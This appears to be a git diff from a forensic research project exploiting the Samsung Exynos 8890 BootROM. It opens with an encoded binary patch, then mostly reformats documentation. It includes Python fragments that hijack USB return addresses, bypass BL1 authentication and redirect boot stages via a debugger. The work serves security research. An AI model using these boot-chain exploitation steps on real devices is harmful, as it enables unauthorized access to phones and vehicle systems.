z;>fQO^t7J2jGURTIU;=Wr^S}06m@rK7{f$yOW)4YpC(p<+^MbomRKs`w+#Qa;;npP
zY|-$dvqBI3q(H-~X!SFUl-}y-l>PnRZmKrg&48mwT>nQ*T>mRfU^Bov;ZN~%d(GcI
zIKJ1U@Ao^u$H)Oj%-8_3YPiGd5h~N~0jJpRJ0RNaOe1ityfTf!E^Ng3_>zZwOJ{}D
zGl?uL{tjZr`K1uC<1LRyF&IIzN5Dl0L8vQ>D&`(BoB9lwKh90yus8ScKFl`JFnkd+
z`A?55Sr(ymP{?0E(4kw~@#p5mFhzY2ju&eKu@pUu_W>y1P=ev)T&LT7eaH7g$M0gt
z<7AOtui1Tl$KnK1+3vMmX92*B7TFED&n4Ilo87PKd|h0R;cBDBYNICmt6ATaN~5Ox
zY~Pf%dh;u>kEyxqv-CidJ(tf+g2%_I4&T3o^ZpMF#wmdIu!TczBurQ4@Vm;~55Y0n
zr7zE@bqvL;HYhy~=oi8c9sM|x+SYY-sw)I#QEoWONH`!hlla+41ImrTfg96`uF9_V
zZzlqgun&rbg1&lpCt$}YnnZK%CYs6vF(QTSy1-R5*pA1?l!`~Mk3`i*-R2~;UEpJG
zEZ{i7;{<@Ki0Z)WJ3A2xclmQi4Da2p>IT5=l<T@n9ERP*S-O5xbrv5lbOZ>Y9Tj_o
zUif#ey#=bd(JyOBG`IHsI9O@M$__Z{cpcS(!wP!WjW1yx6=lQDyS1!7+p=T<8YzT<
ztWV}b)uW1ek1x+TgC8gKd#V!)-}-n^Hc!USNC5dbKGGwrD14@kjuf<wls3==7`&a9
z6MSF66YtBP+wM2$BcERy=tgm@wcD?EeuPt+1=!^__og6u>^_ApvWJ&EA5%8k?T_n9
zRgCCO$w!3LO22s*`kaMdr~lSxp;z`fO0kUGRjD?LIA+)JoWj3J1uh<ZQ!Cohix%nV
zfG=3XV#8{G&cw#xT}5CdnOR%*PHH$_i23L#!QzgnY3!2ZhFG_lpBhu6DpvUEZZ6))
zXqjU%R;0T9Kz+9w?FG~Z4eUH${q#4Bb9E*w%7>%)BV9=~b9c^Eo|gD}$<VQYl$a5{
z@9&9jI_<+DkW8{lr<>v}hAnM#2I6lzAWs;#ByySdN;15@c{)?<OFGH{=F~D>i4!-}
zbWK`iDiKkY<Ik-$_Xm|JWauUwy8>k7cKx2Dl<xGtjt%&zvgv14U9xb2H-Bv+dHy(=
z8sPlpU;81@$AGveI%e6<W4QC*^~ZqkZ&eQa1O2S7y}A+^R1Q&L{&#;B0Jt@_{CLl$
z)+|UhNr{i&Hy(`WeLW-pd^|(-dj5LrlrSQLKn;x>caoBMIYR(hx(w~$73|^#^ta2c
zT<+_6f!8qQ+SEH7F6!&R2a5L(wW4s#M3Qn<-x^Mmipz+7$eM^Pr7PLKQ21Dvk<Lzp
zDZW7?=|lv*eY%r}Gy_QBXUO9j9K3y-{<g$P8%@{03qkji0q@d4M{ZI{kkl(Zx66dY
z5qtbS2DDXn-B5doehBo%=b&V@80idC|BO^hjBdWG+=iEn+O2xw>?debv67+W8#-KD
zI6uclJ;%GSG(py$nwwn&s*lt~E(-EgD!Q#-VKCVG&X32L1lTqrMpv&Fv&wE5wO99$
zv7^9F>trc3_ZLy{mU9_;Qcy)P8Ur@Dl*-X$cRo9)He)tFVnB6lJlcyxAmpsFC3-WE
zE1_t#qG)<yb~ytT7p&IY`JaK~vw_5m{5HCHR?$<{S1;N;CFK65JMG&I2cmSW<f}Em
zslbpDYqwWD1TbrG`EB?fk;Dz!-5h$1C^1w>9e#5~gY4!~L<RHb5KYUiiWkn*!L*45
z8Ly_{!^$HT)V(f0UqE%1p_UFLKPGL*{Lu`Gl#3mNe)tMa7cQWVdL$3GHE2LbBhTeU
zW}wS?5ON++vdE&X-vh(m2X)QQmFq41D#v=iSv)HMz~3u!u({4+ex0twDv><}&9IDZ
zk$n2Wa5fp$oz+OjFRd|%`d2X@={i@|6<_BMlvSuSL_uXru{_?)N<YNU+N_8pmkUHQ
zpG(^V)ulL6DgHZZTX;c+Bt`X&$SR9nO*dL;2#Tc}4gXTUv*y)|Iym?Dvh(0aAr)B?
z&idg2ybYnz6=SWujlMhc%ejOxWYd&b>8$aJy-2Wj@mw}-e|Lmw*e%B(n7@Gni)vh1
zJg3t{zD{J1Nug7Ei5skrngGvssRX@Il)A*xNhqcJ<<g8lUq4QSnOUuMwNGb3T^~gx
z&usWki;dv?)qMRlG@kbPwwC^g>@cZ8nV$v)fJN00xJ1dPj@+gZ<WJ&wR84pJBs4tj
z_JTI~in4OE$!OMNFl_%(tCl#uo9`dxG-Mnel6Y9|x#XjlSJ@OiPDufEM5VqMVpo60
zfRcoAp6!ZtnHF@gqN_i_w^0uY5KUatoTtU{nLj_hn&-hCA3_Z~TeRMMKU!`@@*Obh
zj4Oqo#;uZpg7;tu)ckt>efgVA_$_?+vAo(z!Vd+umV1k89o=M~v?IO-P~-I|0gcti
zjVoo6J?gWHDpMbth%t!EkkW~=9CMV4#hkq~d&1hi8&mH8Jn~kySiNafSRB<j9&PM$
zJrkd`bOJ5YYUa;Cv>td@kfqZGfj5^0IX_^Fq-W)%m6i_FTho>H-ld9e_WR;l7n=DC
z^`k^5<w!mb$;t&bjVI1it@srS)o7xm6I@9c<V<?Yrn==XjxyYXkOydAfAJaAtz00V
zKBD~72%4*_8-0_@o8H)!EUZL7Yir(2VZm^=Sk4=i%uc$lo4??8sP)Lu0NB{(%)Ws4
zc{=+>E<6KDr1EwK{bl<PWJG0kyPl?MzUio6JwJ$ydgj!a3LI@|lpGJ<>gwwh)i$CS
z%C;k?Ghpi}CX*~eZ;x5W^pK6-$?W+b*?)}VZB0Y2grLMpSe4A9k&ce(Ha;xYNbF1}
zAGwPM=V2Xv5?*`vjW|w75{T|2DoZd7@oKB<QS{fu^Y-~{@Xg4m)NG7D8S0^%Q)~M(
z0IxDzwuu<a+Q?uze?iN}aA76xg^9COHH+E8=pyKx)ksG=nF36b<v>wc1HTe8$(ZB|
zw{uKh3Z7HUrBOXUrTxkwtYq<6lboqTZ$4udCy$g1Rv-UD=0~=AV8A6S0!a(%T1+Y)
z6y?gJMKgYHY&ohc4{xB@HbKQc#;I3UPUrcuMq96yhz3u1M~IxhfRroe;Bl&c;Fti2
zqcp5vfZonzN2+^($j{h?Emh$0i41S8{A2|ZjHSkfzPv-=pHs|D)hjI^^5tPrwfPfG
z^@@FUlfJsbBNS+j&)H6!`vq4i$p4jppY9%-_69Eh(CqVoCz?_kUWbxCMQKC5e@W`<
zRWbft&d|Y_6SrZ`w87OkqoEmR%O7y5pH?#Pgp%oC3dG@A5|s?WlI*$%|B%RLF*I`W
zV2}H&YuH6o6<27dc*!;*7Y_Oj>WY13QD(y<p}4&q?Ez%|d8{9Vi#{dVnZtk2twQZU
zC~=PRZbb`om3}lOAG!xb<jSiN3O&%vkh;**8qW~@Bc+O04>5U<-Icn~XBvN?zks&R
z+hUj7N&MjB_(gGlYL^aD{`SteLKw6&caJoLr3)8?tMXVN0;Q^27V{0(So@@+VX2@<
zUmDa7pd4O%j7YBr^eC#kD_;3|Gk@7i=J2L^ds1$A7~HsvUPWDERj_b|m}NLu#=NLO
zVx-p!dQLweZrYJ^Xg%mz4|P@kozDR8E~37BoQC`y#;q%g>pX{A=9&ozX-%i2UE?xN
z)XAl+$|j1H6I44PHyb{p$t(@Ke<@M87zBU{_u0ekW@v62^}ksu?1n5`d$fKIHg1M`
zEE(Hn!Jib}a&Jxbs@KkM^p))-3l`($y4~>mtdU^JD@Lg{NP~@SfoQQsxi%iwqwp9I
zt8O)Iqn&gUZxenfUCxKtHrjCXo&QoTFKp2c!=tCQWUaYwp+NRLJC+^STK7XnC(tUT
zq}h3+LqGyarTe=;R|z3%TnU@&3JgpvaBG5x(h(xuBZx4o|33eEutN16DpngZW#^>)
z@humrLy@{xOrn`mF#KgC<l9AdBp|6W#SxO`*&IY&yC6UpLgR1ZDCaWAYlZMO5n)oT
zyjn>A(Awxb^)V*TBi;||H(v_-fRh6|SaRFd7Hmj^fo9xZMLF{mi{OBu&g;Vm+7hb_
z_Rs65W_{y^Z#i?Aq2Cg%KIy@M0I5OSh;I)uKe|vTMZX=&A=4Y~;C%m2kjD52hcN#?
z=0A{xf0zD0OyK|N@&5s?@L!OGf0G*iZ<qyKDJ65=U(d*gpN@sD{<5qkR=fT0nP-OG
zm;uaQ+KPFZg?>=wyatq=_Lj{9lfP~v;py>L8be0OC~EJeI8XK>&+oa~(oQW-kZmLE
zL%2UK!J>4T?Fq2ykH!C_e#No)?p*@%>vS({rZ>D>icXTr7L|x1A&LSPM^UD24YS;u
z{Kjd!pPF+)aRxm0EW$&F+`1=~&vUIQGyrd(8}IxNX@Xs>iA`2@5*lb?*TrK^EXW~*
z<*lL?S~dQ|9jhwK@|y3gs;|d*?W6DOs1-K|e_dB9MI+*(l1S#3O20R0uQGdcR%vl4
zs=P}7u-<#=FQBv96zCm$m_mw$^@DF);Il4OcWuB^TXTj*=nsaJyZYY9Kc-oAGe8|}
zPSh?M!(H$;QC{x%LBtJ|q*H~_;ZQL-niv<wgzdBfviBT<?eC9c%-Ix|%t#Z6Unk&a
z9#|(&Xi6yvut`!2^X#*9oewiAO305i7mX(G;O_xo?56O|lGMwJO37XXJ9W{q;GlQv
z7fjd%oY=?x^&0Cg&t{3IiAy4{PgV2^07NgQK3pncoyb5A*{A)C>m1L87+=e*y$yoJ
zuz0G$GIhrjb!Y*t{F})Fy;Z|MsQ;i}Y_IokdJqv1SW*59{qk?7dVP<F72?0<6=L!F
z*JMSB#$Gc2+BWtgOYHSx`fnQ@{J(81Z?Z%sFw4Kn|FM(*ZRf%5buin%%Vqzy*6>#R
z*E-Kz9{V4F`+uX|6Jg%0RR5IxCsFMmr2GFYzKIe(q`Lq3{3o{t>wg^J)^7?p&Bnsr
z-Nw<%jRWjpuksNQi2&ihr(yaJt_=bL@&8eC;BBHUD{10{4;JX3Q~YQ9z^8EfkA=n-
v0l~q--Q+(H|6e?MkvmH+dU&f2AR{0U{zn}Igg5qy?|d2205~BB0pWiEd(~<z

diff --git a/documentation/source/BootROM_8890/02_frederics_exploit.rst b/documentation/source/BootROM_8890/02_frederics_exploit.rst
index 041ab68..81dab56 100644
--- a/documentation/source/BootROM_8890/02_frederics_exploit.rst
+++ b/documentation/source/BootROM_8890/02_frederics_exploit.rst
@@ -14,9 +14,9 @@ dldata
 A key For uploading a stage to boot, a custom protocol is used. The dldata that has to be send is 512 bytes long, and has the following format:
 
 .. figure:: images/dl_packet.drawio.svg
-   :align: center
+	:align: center
 
-   The dldata packet is used to send data to the BootROM.
+	The dldata packet is used to send data to the BootROM.
 
 The size in the packet is the total size of the packet, including header and footer. If we modify this, we will have a payload size of around 502 bytes.
 
diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index 82b5482..d146381 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -8,7 +8,7 @@ This part describes the boot chain of the ``Exynos 8890`` SoC.
     This is all still under development and will change.
 
 General overview
-===============
+================
 
 Memory layout
 ^^^^^^^^^^^^^
@@ -175,7 +175,7 @@ Python code to setup the debugger.
     self.cd.test_connection()
 
 Stage 1 - Initial exploit
-===============
+=========================
 Frederic created a payload called 'Exynos8890dump_bootrom', which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic's C code was implemented in python.
 
 .. code:: python
@@ -239,7 +239,7 @@ After this exploitation, we're able to send custom payloads. The first payload t
 @EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?
 
 Stage 2 - BL1
-==========
+=============
 Here, in order, the patches we applied to get BL1 to boot:
 
 .. figure:: images/boot_chain_bl1.drawio.svg
@@ -257,9 +257,9 @@ Here, in order, the patches we applied to get BL1 to boot:
 
 
 .. figure:: images/initial_boot_function.png
-    :align: center
+   :align: center
 
-    Overview of the initial boot function in the Exynos 8890.
+   Overview of the initial boot function in the Exynos 8890.
 
 At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger. 
 
@@ -315,6 +315,7 @@ Stage 4 - BL2
 This is our current progress. BL2 has booted, and shows the VBAR's for EL1. 
 
 .. code:: bash
+
     MMU is 0x0 (0x1=enabled, 0x0=disabled)
     TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
     VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
diff --git a/documentation/source/BootROM_8890/04_notes.rst b/documentation/source/BootROM_8890/04_notes.rst
index aa16e3e..b20d806 100644
--- a/documentation/source/BootROM_8890/04_notes.rst
+++ b/documentation/source/BootROM_8890/04_notes.rst
@@ -19,14 +19,13 @@ What is interesting about the ROM is that it starts by checking MPIDR_EL1 regist
 
 BL1 peculiarities
 -----------------
+At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.
 
 .. figure:: images/bl1_auth_references.png
     :align: center
 
     BL1 authentication
 
-At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.
-
 If authentication at auth_bl1 is succesful, the returns a value from a function at ``1230c``. This function does some things, but eventually jumps to a function at:
 
 .. figure:: images/bl1_auth_follow-up_1230c.png
@@ -55,6 +54,7 @@ However, this does not result in a jump back to the debugger. But the ROM still
 By adding the IMEM to ghidra, we can have a look at what is going here. After having modified the LR to jump back to the debugger and jumping into auth_bl1 at ``0x00012848`` we jump back to the debugger. Jumping into BL1 at ``2c0`` does not return us to the debugger. Here we need to hijack ``020200dc`` and ``02021880`` we're able to boot into BL1. We store the address of the hijacked function, to restore it later for a proper boot flow.
 
 .. code:: python
+
         auth_bl1(DEBUGGER_ADDR)
         self.usb_write(b"FLSH") # Flush cache
         hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) 
@@ -66,9 +66,9 @@ By adding the IMEM to ghidra, we can have a look at what is going here. After ha
 Authentication of BL1 seems to be done at ``0x0012848``. With return value '0' expected when this function is executed, to execute other functions.
 
 .. figure:: images/bl1_auth_references.png
-   :align: center
+        :align: center
 
-   BL1 authentication. 
+        BL1 authentication. 
 
 purpose
 ^^^^^^^
@@ -134,30 +134,30 @@ Replacing this function with our debugger makes us jump back:
 
 .. code-block:: python
 
-    # Overwrite jump back
+        # Overwrite jump back
         self.cd.memwrite_region(0x02020108, p32(0x2069000))
         self.cd.memwrite_region(0x020200e8, p32(0x2069000))
-            
+                
         def jump_bl1():
-            self.cd.arch_dbg.state.LR = 0x2069000
-            self.cd.restore_stack_and_jump(0x02024010)
-            # self.cd.restore_stack_and_jump(0x02021810)
-            
+                self.cd.arch_dbg.state.LR = 0x2069000
+                self.cd.restore_stack_and_jump(0x02024010)
+                # self.cd.restore_stack_and_jump(0x02021810)
+                
         bl1 = open("../S7/bl1.bin", "rb").read()
         self.cd.memwrite_region(0x02024000, bl1)
         self.usb_write(b"FLSH")
-        
+
         # auth_bl1()
         jump_bl1()
         assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
         self.cd.arch_dbg.state.print_ctx()
 
         root | DEBUG | 
-            X0 : 0xc00000 | X1 : 0x2069000 | X2 : 0x0 | X3 : 0x2023114 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
-            X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
-            X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x20200e8 | X20 : 0x0 |
-            X21 : 0x80000000 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
-            X28 : 0x0 | X29 : 0x2020ed8 | LR/X30 : 0x202419c | SP/X31 : 0x2020ec0
+                X0 : 0xc00000 | X1 : 0x2069000 | X2 : 0x0 | X3 : 0x2023114 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
+                X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
+                X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x20200e8 | X20 : 0x0 |
+                X21 : 0x80000000 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
+                X28 : 0x0 | X29 : 0x2020ed8 | LR/X30 : 0x202419c | SP/X31 : 0x2020ec0
 
 However this does not fully run bl1, so we will have to dig a bit deeper to see the puropose and when to jump back to the debugger.
 
diff --git a/documentation/source/conf.py b/documentation/source/conf.py
index 8078cce..2fabbf0 100644
--- a/documentation/source/conf.py
+++ b/documentation/source/conf.py
@@ -5,10 +5,11 @@
 
 # -- Project information -----------------------------------------------------
 # https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
+import os
 
-project = 'Samsung'
-copyright = '2024, Eljakim, Jonathan'
-author = 'Eljakim, Jonathan'
+project = 'Samsung S7'
+copyright = '2024, Nederlands Forensisch Instituut'
+author = 'Eljakim Herrewijnen, Jonathan Herrewijnen'
 
 # -- General configuration ---------------------------------------------------
 # https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
@@ -20,6 +21,21 @@ extensions = [  'myst_parser',
                 'sphinx_wagtail_theme',
 ]
 
+# -- Settings for confluence -------------------------------------------------
+confluence_publish = True # Set to True to publish to confluence
+confluence_space_key = 'DTSPHINX' # E.g., DT_Sphinx
+confluence_server_url = 'https://confluence.dev.holmes.nl/'
+confluence_parent_page = 'Automotive' # E.g., Workshops
+confluence_page_hierarchy = True
+confluence_publish_dryrun = False # Set to False to publish to confluence
+
+# Use token for authentication, from environment variable
+try:
+    confluence_publish_token  = os.environ['CONFLUENCE_TOKEN']
+except:
+    confluence_ask_password = True
+    confluence_ask_user = True
+
 templates_path = ['_templates']
 exclude_patterns = []
 
diff --git a/documentation/source/index.rst b/documentation/source/index.rst
index 6042cc5..ffa2532 100644
--- a/documentation/source/index.rst
+++ b/documentation/source/index.rst
@@ -3,9 +3,9 @@
    You can adapt this file completely to your liking, but it should at least
    contain the root `toctree` directive.
 
-Samsung Documentation
-=====================
-Documentation on Samsung devices, currently mainly the Samsung S7.
+Samsung S7 & MIB3 High
+======================
+Documentation on Samsung devices, currently mainly the Samsung S7. Here we're exploiting the Exynos 8890, which is present on both the Samsung S7 and the MIB3 High (VAG).
 
 .. toctree::
    :maxdepth: 2
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index ac9e47a..494a4be 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -772,30 +772,25 @@ class ExynosDevice():
         print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')
 
         # Restore bootflow
+        print(self.cd.arch_dbg.state.print_ctx())
         BL33_jump = self.cd.arch_dbg.state.X0
+        BL33_LR = self.cd.arch_dbg.state.LR
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
-        # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
         
+        # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)
         # Disable this to keep access to the debugger after senindg the next stage
         self.cd.restore_stack_and_jump(hijacked_fun)
 
         # ==== Stage 5  ====
-        #self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
+        # Sends stage 5 (BL33) but returns to debugger after sending. 
         stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()  
-
-        # Patching
-        # stage4_len = len(stage4)
-        # patch_len = len(b"USB RECOVERY MODE")
-        # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))
-        # patch_offset = stage4.find(b"USB RECOVERY MODE")
-        # stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:]
-        # assert len(stage4) == stage4_len, "Invalid stage4 length"
-
         self.send_normal_stage(stage4)
         self.connect_device()
         self.usb_read(0x200) # GiAs
-        self.cd.arch_dbg.X0 = BL33_jump
-        self.cd.jump_to(0x8f000000)
+
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+        # self.cd.arch_dbg.X0 = BL33_jump
+        self.cd.jump_to(BL33_LR)
 
         # TRYOUT PATCHING BL33
         # BL1 is loaded, now authenticate and patch it
@@ -818,10 +813,11 @@ class ExynosDevice():
 
         time.sleep(2)
 
-        # # dump in stages of 100 000 bytes and append to dump
+        # # # dump in stages of 100 000 bytes and append to dump
         # dump = b""
         # for i in range(0x80000000, 0xf0000000, 0x100000):
         #     dump += self.cd.memdump_region(i, 0x100000)
+        
 
 
         pass